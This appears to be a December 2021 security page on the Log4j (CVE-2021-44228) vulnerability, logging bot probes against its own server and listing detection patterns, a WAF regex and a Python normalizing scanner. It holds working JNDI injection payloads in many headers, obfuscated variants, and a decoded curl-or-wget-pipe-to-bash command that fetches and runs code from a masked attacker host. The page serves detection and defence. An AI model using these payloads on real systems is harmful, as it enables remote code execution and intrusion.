CVE-2021-44228. Monitoring and detection of the Log4j vulnerability.

testsoft.net – web bot map – december 2021

This page contains information about the vulnerability in the Apache Log4j component. Below are examples of attacks against the testsoft web servers: probes for CVE-2021-44228 and attempts to exploit the vulnerability.

167.172.233.101 – testsoft.net (this web server)
x.x.x.x – IP address of the attacker
[attackerserver].com – DNS name of the attacker's server.
[Base64] – request payload encoded in Base64

WEB BOT REQUEST TS-122021-001
Example HTTP request:

GET /?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=} HTTP/1.1
Host: testsoft.net
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=}
Referer: http://167.172.233.101:80/?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/KGN...[Base64]...2g=}
Accept-Encoding: gzip
Connection: close

The [Base64] payload of the request, decoded:
(curl -s x.x.x.x:5874/167.172.233.101:443||wget -q -O- x.x.x.x:5874/167.172.233.101:443)|bash

WEB BOT REQUEST TS-122021-002
Example HTTP request:

POST /login HTTP/1.1
User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox
Accept: */*
Host: 167.172.233.101
Content-Type: application/x-www-form-urlencoded
Content-length: 46
data=${jndi:ldap://x.x.x.x:1389/Exploit}

WEB BOT REQUEST TS-122021-003
Example HTTP request:

GET / HTTP/1.1
User-Agent: ${jndi:ldap://x.x.x.x:1389/Exploit}
Host: 167.172.233.101

WEB BOT REQUEST TS-122021-004
Example HTTP request:

GET /${jndi:ldap://x.x.x.x:1389/Exploit} HTTP/1.1
User-Agent: Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox
Host: 167.172.233.101
Cookie: test='${jndi:ldap://x.x.x.x:1389/Exploit}'

WEB BOT REQUEST TS-122021-005-EXT
Example HTTP request:

GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.[attackerserver].com%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.[attackerserver].com%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-id123456_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.[attackerserver].com%2F%7D HTTP/1.1
Host: testsoft.net
User-Agent: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.[attackerserver].com/}
Connection: close
Transfer-Encoding: chunked
A-IM: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_A-IM.log4jdns.[attackerserver].com/}
Accept: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept.log4jdns.[attackerserver].com/}
Accept-Charset: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Charset.log4jdns.[attackerserver].com/}
Accept-Datetime: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Datetime.log4jdns.[attackerserver].com/}
Accept-Encoding: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Encoding.log4jdns.[attackerserver].com/}
Accept-Language: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Accept-Language.log4jdns.[attackerserver].com/}
Access-Control-Request-Headers: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Headers.log4jdns.[attackerserver].com/}
Access-Control-Request-Method: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Access-Control-Request-Method.log4jdns.[attackerserver].com/}
Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Authorization.log4jdns.[attackerserver].com/}
Cache-Control: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cache-Control.log4jdns.[attackerserver].com/}
Connection: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Connection.log4jdns.[attackerserver].com/}
Content-Type: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Content-Type.log4jdns.[attackerserver].com/}
Cookie: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Cookie.log4jdns.[attackerserver].com/}
Date: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Date.log4jdns.[attackerserver].com/}
Forwarded: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Forwarded.log4jdns.[attackerserver].com/}
From: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_From.log4jdns.[attackerserver].com/}
If-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Match.log4jdns.[attackerserver].com/}
If-Modified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Modified-Since.log4jdns.[attackerserver].com/}
If-None-Match: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-None-Match.log4jdns.[attackerserver].com/}
If-Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Range.log4jdns.[attackerserver].com/}
If-Unmodified-Since: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_If-Unmodified-Since.log4jdns.[attackerserver].com/}
Origin: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Origin.log4jdns.[attackerserver].com/}
Pragma: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Pragma.log4jdns.[attackerserver].com/}
Proxy-Authorization: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Proxy-Authorization.log4jdns.[attackerserver].com/}
Range: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Range.log4jdns.[attackerserver].com/}
Referer: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.[attackerserver].com/}
TE: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_TE.log4jdns.[attackerserver].com/}
Upgrade: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Upgrade.log4jdns.[attackerserver].com/}
Via: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Via.log4jdns.[attackerserver].com/}
Warning: ${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_Warning.log4jdns.[attackerserver].com/}

${jndi:ldap://divd-id123456_${date:YYYYMMddHHmmss}_https_body.log4jdns.[attackerserver].com/}

WEB BOT REQUEST TS-122021-006-EXT
Example HTTP headers used by bot systems to search for vulnerable servers:

GET /?v=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A%3A-r%7D%24%7B%3A%3A-m%7D%24%7B%3A%3A-i%7D%3A%2F%2Fx.x.x.x%3A1442%2Flink%7D HTTP/1.1
Host: testsoft.net
User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Encoding: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept: */*
Connection: keep-alive
Referer: https://${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Charset: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Datetime: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Accept-Language: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Cookie: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-For-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
TE: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
True-Client-IP: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Upgrade: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Via: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Warning: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Max-Forwards: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Origin: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Pragma: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
DNT: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
Cache-Control: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-ATT-DeviceId: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Correlation-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Csrf-Token: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-CSRFToken: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Do-Not-Track: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Foo: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Foo-Bar: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-By: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-For-Original: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Host: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Port: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Protocol: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Scheme: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Server: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarded-Ssl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forwarder-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forward-For: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Forward-Proto: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Frame-Options: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-From: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Geoip-Country: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Destinationurl: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Host-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Method: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-HTTP-Method-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Http-Path-Override: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Https: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Htx-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Hub-Signature: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-If-Unmodified-Since: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Imbo-Test-Config: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Insight: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Ip-Trail: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-ProxyUser-Ip: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Requested-With: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Request-ID: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-UIDH: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-Wap-Profile: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}
X-XSRF-TOKEN: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://x.x.x.x:1442/link}

Additional links on the topic:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://tryhackme.com/room/solar
https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
https://www.youtube.com/watch?v=7qoPDq41xhQ
https://github.com/NCSC-NL/log4shell/blob/main/detection_mitigation/README.md
https://github.com/pedrohavay/exploit-CVE-2021-44228

Known string variants seen in anomalous requests:

${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://x.x.x.x/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://x.x.x.x/}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//x.x.x.x/}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//x.x.x.x/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://x.x.x.x/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x/}
${${::-j}ndi:rmi://x.x.x.x/}
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//x.x.x.x:1389/TomcatBypass/Command/Base64/d2d...[Base64]...mVy}')
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}a${::-p}${sd:k5:-:}//167.172.233.101.[attackerserver].com/link}
%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2Fx.x.x.x%2Fsecurityscan%7D

Patterns for detecting attempts to exploit the Log4j vulnerability:
%24%7bjndi
%2524%257Bjndi
%2F%252524%25257Bjndi%3A
${jndi:ldap:
${jndi:ldaps:
${jndi:rmi:
${jndi:dns:
${jndi:nis
${jndi:nds
${jndi:corba
${jndi:iiop
${jndi:${lower:
${::-j}${
${env:BARFOO:-j}
${::-l}${::-d}${::-a}${::-p}
${lower:j}ndi:${lower:l}${lower:d}a${lower:p}:
${upper:j}ndi:${upper:l}${upper:d}a${lower:p}:
${::-j}${::-n}${::-d}${::-i}:
$%7Bjndi:
base64:JHtqbmRp
j}ndi$
jndi%
jndi:
j}ndi
j%7Dndi

Example regex string for use on a WAF:
(?s)\$\{.+:.+\}
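As an added example (not code from the testsoft page), a small Python scanner that applies the WAF regex above to raw request lines and, separately, normalizes each line first (URL-decoding up to three layers and collapsing the `${::-j}`, `${lower:}`, `${upper:}` and `${env:X:-j}` lookups the way the Log4j interpolator would) before checking for a `${jndi:` prefix. The sample lines are constructed after the captures above; the lookup collapsing is a simplification covering only the obfuscation variants listed on this page.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the captures above (not real log data).
SAMPLES = [
    "GET /?x=${jndi:ldap://x.x.x.x:12344/Basic/Command/Base64/AAAA} HTTP/1.1",
    "User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://x.x.x.x:12344/a}",
    "GET /?v=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D"
    "%3A%24%7B%3A%3A-r%7D%24%7B%3A%3A-m%7D%24%7B%3A%3A-i%7D%3A%2F%2Fx.x.x.x%3A1442%2Flink%7D HTTP/1.1",
    "X-Api-Version: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://x.x.x.x/}",
    "Cookie: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//x.x.x.x/}",
    "GET /?id=%2524%257Bjndi%253Aldap%253A%252F%252Fx.x.x.x%252F%257D HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

WAF_RE = re.compile(r"(?s)\$\{.+:.+\}")                   # the WAF regex given on this page
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)   # lookup prefix is case-insensitive
INNER = re.compile(r"\$\{([^${}]*)\}")                    # an innermost lookup (no nested ${)

def resolve(lookup: str) -> str:
    """Collapse one innermost lookup the way the Log4j interpolator would."""
    if ":-" in lookup:                       # ${::-j}, ${env:X:-j}, ${k8s:k5:-J}: default text wins
        return lookup.split(":-", 1)[1]
    key, _, val = lookup.partition(":")
    if key == "lower":
        return val.lower()
    if key == "upper":
        return val.upper()
    return "${" + lookup + "}"               # jndi:, date: etc.: nothing to collapse, keep as-is

def normalize(line: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL-encoding, then collapse obfuscating lookups."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    prev = None
    while prev != line:                      # repeat until no resolvable lookup is left
        prev, line = line, INNER.sub(lambda m: resolve(m.group(1)), line)
    return line

def classify(line: str) -> dict:
    """Compare the raw WAF regex with a jndi check on the normalized form of the line."""
    norm = normalize(line)
    return {"waf_raw": bool(WAF_RE.search(line)),
            "jndi_normalized": bool(JNDI_RE.search(norm)), "normalized": norm}
```

Running classify() over SAMPLES shows that the two URL-encoded lines are missed by the raw regex and caught only after normalization, which is the case for decoding before matching on a WAF.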